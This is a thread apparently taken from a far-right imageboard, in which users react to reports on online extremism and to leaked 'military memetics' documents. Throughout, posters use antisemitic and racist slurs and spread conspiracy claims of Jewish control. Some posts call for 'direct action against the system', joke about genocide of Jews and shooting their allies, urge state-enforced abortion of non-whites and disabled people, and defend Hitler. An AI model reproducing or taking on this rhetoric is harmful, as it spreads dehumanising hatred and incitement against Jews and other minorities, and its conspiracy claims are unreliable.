I'm sure the FBI is terrified that the memes will get too dank when viewing anything not sanctioned by the US Government, ie slightly un-PC jokes, is enough to label anyone a terrorist where they can put cameras and microphones in their rooms, make sure they only interact with informants, publish their medical history and web history.

Keep in mind the FBI routinely does this to preteens and then wonders why anyone could possibly hate the government.

Very cute low.energy shill attempt.

archive.is/4dlTY

DA GOYIM.KNOW

This pretty much confirms the COINTELPRO copypasta was definitely not an elaborate joke.

This. They “infiltrate” is like we aren’t open and honest with our intentions and views. What they’re too retarded to understand is they can’t stop us because our views are organic and factually correct. They see it through the lens of their views which consist mostly of falsehoods and unnatural ways of thinking.

I bet some shills have, and are among us that have turned. On another note, could you post the last flash in this series? And possibly some images from the Stussy threads? All I have are thumbnails.

The left are fake particleboard furaniture, they are made of a mishmash of cultures formed into cheap tables and cheap kitchensets with a global Trendy culture designing them. They exist to market themselves, their lives and their stuff, and are quite disposable and rather cheaply replaced. Look at tumblr, look at instagram look at faceberg, all of that is set up to market their lives as desirable, but the images, like their furniture, like their lives, is fake and their carefully crafted illusion is all that's keeping them from being a bloody spatter at the bottom of a skyscraper. They will march to their deaths to protect this illusion, the one that keeps them from suicide. Ironic eh?
I hate shilling blogs, but this one, despite being a bunch of neo-commies explains more.
The Ikea Humans -→ archive.is/MQgQe

Archive for the article headline you posted:
archive.is/KNeVL

A year on, they're still flummoxed and pushing their bullshit kike narrative.

Too late. Search up "cupsonas".

is the us government a paper tiger?

Their one and only view is that Jews can never lose.

Why else would they be shitting themselves over a few shitposters on an online forum.

Peak journalism

Lemme see if I can explain this, these people are a crowd of lemmings that idolize the Jew York Times and care only about what their peers think and do (And THAT is heavily jew controlled via image saturation) and the crowd is lead into university and these crowd followers follow it in. All they wanted is more connections and more hands to pull them up the social ladder, but that's all they have. They're just smart enough to realize how dumb they are compared to others like us.

It is, up in leafland, the teacher's union is openly May Day parade marching, card carrying communist. They only teach communism here, everything else is only a veneer over a rotting tooth, and up here, we even have drug dealer's unions.

where can i get my hands on these leaked documents pls

/ourguy/?

Well, does anyone have them?

Try pastebin

REMINDER: There is NO political solution. What Hitler did once, the kikes will not allow to happen again. The entirety of the US government is inherently bad. There is not a single person in the government that is even remotely on our side.
We need DIRECT ACTION AGAINST THE SYSTEM.
Pic absolutely related, fucking read it.

And capped, good post.

>>>Holla Forums785171

The thing about this one is that it's really them that care about the labels. We don't give a shit. I was reading their stupid report and the first thing that struck me was how they were trying to define and nail down the labels of "Far-right", "Alt-right", "Extreme-right" (my personal favourite) and to assign specific meanings to each. Only a label-thinking kike would do something so insane. Internally, we define ourselves individually according to our values, we don't tie ourselves to labels.

Yes

JAMAL, you're here again! I see you've added a new trick, incitement to violence. Did you get diversity hired at an alphabet agency?

Confirmed working on Windows 10™

lol

This is your best narrative yet, kike.

It's called the truth, if that radicalizes people into action so be it.

This is a good stylometric hint that someone is an actual goon. Often they'll just restate your argument in shittier terms and follow it with 'lol'.

Because goons totally call for the genocide of all jews, right? Never mind a bullet to the brain of their shabbos goyim. Sure thing, shlomo.

These gondolas are comfy af. be sure to bring them over to /gondola/ as well. Also I love how in the first one the guy who shoveled the snow stopped at the museum's staff's car.

What happened to Safety Bear and when did he loose his arms?

You have to tell us if you're a cop, right?

How hard will the kvetch when they realize that we've been using Marine Corps doctrine for years now?

check

I believe they are referring to the campaigns against google.

hey faggots
Now that I got your attention, I need to ask a question which is slightly related to OP. Some fag from a forum is trying to justify that nig lives matter is more important than white lives matter which is just a mockery of BLM.

Can any of you fine gentle give me some unbias links showing what White Lives Matter stands for and what they are trying to spear head for, instead of just being a contrary to BLM?

I love this website.

Because we dont need to. We have memetics. The kikes can not figure out how the shit works, furthermore they may actually be somehow physically unable to meme. All they can do is use their deceptive propaganda and brainwashing. We've no need for that, we have enough oldfags that actually learned how to real memes that the kikes and their shabos are scratching their heads that their moloch rituals dont seem to work at all against a couple of dweebs acting like retards.

with idiots like you its amazing we've gotten as far as we have

you'd be better off in the qtddtot buddy. hWLM is just the same nationalist front guys marching under a different banner. From what I know they are opposed to the mass murder and rape of Whites as well as the media indifference and apathy. Things like the Fresno shooting, white autist beatup, Texas college stabbing, and Queen's acid attack all fly under the radar for BLM and the race-blind left. It's more shoving hypocrisy in the face of the left/right than an actual movement.

what am I doing wrong?

it's called a retard filter. Enjoy your new Windows installation.

You have no idea how horribly wrong you are. There is one and only one reason why humor is such an effective weapon for us. In order to be a joke. In order for something to be really fucking funny, and Im not talking your stupid kike comedian weedsmoking slapstick poop joke.. thats not funny thats a trained laughter response. Thats decades of watching tv with dinner and hearing laff track after lafftrack played over retarded one liners and idiotic scenarios.

No, true humor has infinitely more in common with your webm than any kike leftist 'comedy'. Ya see, what true humor is.. it's pure, hard logic. its logic so pure and hard that the presents of something impossibly irrational makes it hysterical.

Take your webm, for instance, its such a peaceful and beautiful scene with beautiful music. A nice house in paradise, on the shore, and yet there sits gondola in shade. There are footprints, someone took in the laundry and hung up some more, and then they walked down the trail and left.

Its incredibly deep and beautiful. Because everything in it is logical. There are no abstract piles of shit or people sticking their heads up their own asses. Neither the kikes nor the commies will ever know what are is because in order to understand and appreciate true art they would have to acknowledge the true logic set which shitrekts their trash effortlessly.

fucking nigger

Greatest thing I've ready all day, thanks user.

If this is actually true and kikes are kvetching stop my penis can only get so erect

for those who haven't seen it

is he dying?

Obviously getting caught wasn't part of their plan.

All this shit just reads like a bunch of boomer fags trying to get money from the guvmint to stop the evul natzi hax0rs on the interwebs

And yes I'm making fun of their old ass memes

Linux method is provided here.

try it on a different computer, maybe there it will work

Oy Vey. A small percentage of Whites still fight for the survival of their people.

(and so on)
Remember when people like us were a tiny lunatic fringe, hiding away in dark corners of the internet and never amounting to anything?
Now we have an admission from the other side that they expect DOTR.

[clenches anus to prevent prolapse]

That's my real name fight me fgt

Debian doesn't give you a hotline phone to God's office.

I couldn't care less about "supremacist". Yeah gooks are smarter at maths and jews are better at verbal iq than whites. I just want to live among other whites like how my neighborhood used to be before section ape turned it into a crime ridden niggerhole.

We are? which ones?

if this were true they wouldn't pay stunt gooks to sit in their placement exams at college.

You piece of shit.

Gee, misinformation even? That sure sounds like something that must be prevented. You must get right on that. Say, maybe you should read this book. It contains lots of useful ways to deal with dissidents. It's called Mein Kampf. First you create this government media apparatus, that only spreads the right kind of information, and then you abduct all the people who oppose that information, and put them in labour camps. It's really effective. I mean, the democratic system, with its freedom of speech, has failed you. They exploited it and surpassed it, and so now you ahve the choice between putting these people in camps, or submit and be put in camps. you need to be tough on these guys: Create an elite guard dedicated to silencing these people. Abduct them in the middle of the night. Terrorize them until they're too afraid to speak. This will of course need to be legal, and for this, may I suggest a fuhrer who can make radical decisions above the laws that so clearly has failed you?
The time to strike is now, governments of the world! This cannot be tolerated!

That dude is squatting… a fucking bar… there isn't any weight added. He clearly weighs less than half the women I have fucked to boot. How the fuck did a gym let this aids ridden faggot into their zone of /fit/ worship. Sick the nearest chihuahua on him and be done with it.

Watch this and learn young user. Much sage wisdom in this vid on why you should not fear their pathetic mewling.

Well, that's just the thing: leftists have no shame. They really are the lowest and most pathetic creatures on the planet.

We really need another contest.

Soon

jesus christ user, do you want to get backtraced?! because that's how you get backtraced. you dun goof'd motherfucker. consequence will never be the same. you just gave every fucking shill on this board the key to the ultimate brain slushie, and now they're going to use it on us.

DELET THIS

NOOOOOO now the (((deepstate))) has access to our hidden IRC and intelligence mining underground, wtf are you doing

DELETE THIS

That's not how that meme works, dummy.

found the goon

Institute of Strategic Dialogue was founded by (((George Weidenfeld)))

Pic related. Only thumbnail was available because the original page referencing his jewishness is conveniently missing.

Holy fuck, it includes a list of left wing Jews in my area, apparently updated in real time with location information from their cell phones!

Since nobody's linked to the docs, I will.

robotictechnologyinc.com/index.php/military-memetics

Two PDFs are linked, one powerpoint for brainless boomers, and a nice collection of research papers.

i bet a great percentage of that document requires you have control of the media apparatus and drown out non-conforming voices to be effective

It's all over the place really, as I said it's not one single document but a collection.

Much of it is aimed at subverting existing narratives through social media, that's extremely useful. I think the company are /ourguys/ as well, they haven't taken down the links and it's been over a year since these documents got out.

BMW has threads up about it, that's the place to go for further study on these issues.

NEW INFORMATION KEY DUMP COULD BE A PLOT TO GET THIS PLACE SHUT DOWN 400LB HACKERS AND SUCH DON'T GET PLAYED LIKE A FIDDLE SEEMS FUCKY BE CAREFUL

.- -… — .-. - / — .–. . .-. .- - .. — -. … / .. – – . -.. .. .- - . .-.. -.–

VIRAL LEADERSHIP

Oh_Hell_No fabulous vengeful
It's_nice_being_God humility service_sector
mine what's_the_plan Russia Yawn
he_be_like gross Zap hot_air I_donno
what_a_mess do_it wrath busybody nut_job
you_never_know
liberal funny chump_change astounding
adjusted_for_inflation
you_are_my_sunshine
what_would_Jesus_do
that's_for_me_to_know
bad
come_and_get_me if_anything_can_go_wrong

What's a phoneposter to do?

Remember, unless you work for CNN, it's illegal to look at this information. In fact you should probably refrain from looking at memes too, unless you see them on CNN.

you have to pass the test first. Lurk Moar.

that's it, i'm revoking your access. HOW MANY TIMES?

lol

i'm actually annoyed. I would like to be paid. Via lottery, via some random cool event, a 50 bitcoin present, whatever, but my time and energy needs to be rewarded.
I wonder if they have learnt that these threads always end up full of mischievous misdirection?
at least we didn't tell them about the dial up server

Whilst we can appreciate your factual advice about laws and such, we fear your "meems" are a little too spicy and are beginning to touch us in a way only Kevin Spacey could.

Less spicy factisms, please.

I find it troubling that you equate consensual sex with Germans too Russians raping children.

Idiot liberals literally think the only way to learn stuff is through school or reading papers. They forgot you can learn things organically or use common sense. Sage because this article is retarded lib cancer.

Good post - never forget the 6 trillion

Does anyone have link to this NATO Psy Warfare manual?

fuck, I'm browsing on my SNES

Warning Leftist undercoverfag detected, ban him and delete this post!
He is leaking out shit that is not supposed to be in our public channels!

Top kek

i kan hyz typ stuf

Whatcha sliding?

….we invented those fucking tactics in that NATO document

jesus fucking christ, who is in charge of these fucking "reports"? they sound like my fucking grandmother wrote them

how do these fucks even have any hope with fucking ads like "This is an apple, not a banana"

Shills are sliding.

Save the Boer!

And thread subverted. Fuck every one of you idiots who let this kike get away with it. This place is literally reddit now.

I can tell with confidence that all these leaks are literally dumbed down and not particular useful summaries of what we already know anyways from thousands of years of doing the same shit. All these psychological warfare techniques are nothing new and in no way the special property of government.

I literally have read all the CIA manuals and can tell you how to do that and more.

This except it was more than 10 years out of date.

The real reason our views are rising is because this new generation is absolutely fucked. When you are comfortable and thinks are working out for you develop biases and don't question things as much. You get some idea and you're able to keep it even though it's delusional and out of touch, because reality doesn't contradict and challenge you. Such is not the case for us, we are left asking over and over WHY GOD WHY, and because of this we have to revise what we know and really look for the truth again and again. Decadence makes people complacent and stupid. Struggle and survival makes us have to think and innovate to work our way out of this problem. As more and more people are going to be out of work and wondering what is going on in the world, they will eventually find places like this, and it won't matter if each day they read 100 lies and 1 truth a day, each truth discovered will stay with them, and burn away all the lies.

Psychological warfare does involve telling the truth it's not about lying. Using the truth in psychological warfare is highly effective and desirable especially for a movement that allies itself with the truth very strongly. Having to lie and make shit up is for those that aren't allied with the truth and whose agenda isn't the regeneration and uplifting of the people but rather their degradation and exploitation.

Are they just straight up making shit up? I refuse to believe that anything can come out of cuckchan. And I've seen little evidence of the "far right" actually organizing.

I can't think of a single scenario where abortion should be prevented. Whoever wants to kill off their own offspring should be allowed to. Just like anyone who wants to commit suicide should be allowed to. Never get in the way of a person whose doing their best to remove their own genes from the genepool.

Defective whites (retards, cripples, etc.) should be aborted. Liberal whites should not be stopped from aborting their kids either. The whole character of the next generation is going to redpilled from the biological level because liberals didn't reproduce.

Actually scratch this I just now thought up a possible scenario where abortion shouldn't be allowed; the scenario is as follows.

1. The zog declares a limit on how many children the white goyim can have (like the one child policy in Canada). Any extra children had are aborted.
2. The zog starts targeting healthy white babies for abortion, demanding they be aborted, even when the parents want to keep them.

Other than these two cases though I don't think we should stop individuals aborting their children and I do think we should have mandatory state-enforced abortion of non-whites and retards.

Elaborate or give me a story or something I want to learn "the moral of the story" here.

We're not centrist.

We're third position.

We are beyond the left-right dichotomy.

For some reason third position fell out of use though and we became "the far-right" again.

Why do we not call ourselves third position anymore?

Let's not get ahead of ourselves. The aphpabets and the media kikes know mostly how we operate, they just can't grasp why we are winning when they have so much more tools. But they know how it works. The article isn't for the higher-ups so they would believe we do some super-stealthy kackerman work, but for the normalfags so to paint us as elite russian hackers or some other conspiracy do overthrow world peace. It fits in nicely with all the bond and other movies that we are the bad guys, that we, out of our own melevolence want to set the world ablaze for our own amusement. It's all done to convince the normalfags that we don't have even 1 bit of truth in us, and that we're basically hitler

We could, you know, subvert the government. Maybe not the boomers though they're set in their ways.

Meme the Great White Shark into nature is racist.

metaphorically saged

They are idiots who can't find Holla Forums and always pin everything on 4chan because everything on 4chan gets indexed and archived on 4plebs and comes up in search results while actual deepnet sites like our own they never find.

Finally made it to the bottom of this thread. tfw read like 5 threads top to bottom today

ahahah what a fag

DA GOYIM KNOW

Their main problem being of course that Hitler wasn't a bad dude at all. Once the Hitler lie has been exposed they will have nothing left.

This is key.

for instance Defend Europe mission was started as result of complete and total failure of authorities to do their jobs.
Insted, they were doing the opposite.
Mass transport from African to Sicilian coast.

It took US to organize, get a ship, fund it, crew it and get it to the human trafficking route outside Libya to finally put an end to it.
Despite every possible obstacle thrown our way, we did it.

==GLORIOUS-

you just can't make this up, oh wait, yes you can. It's almost like they wrote this before the event happened

SHADILAY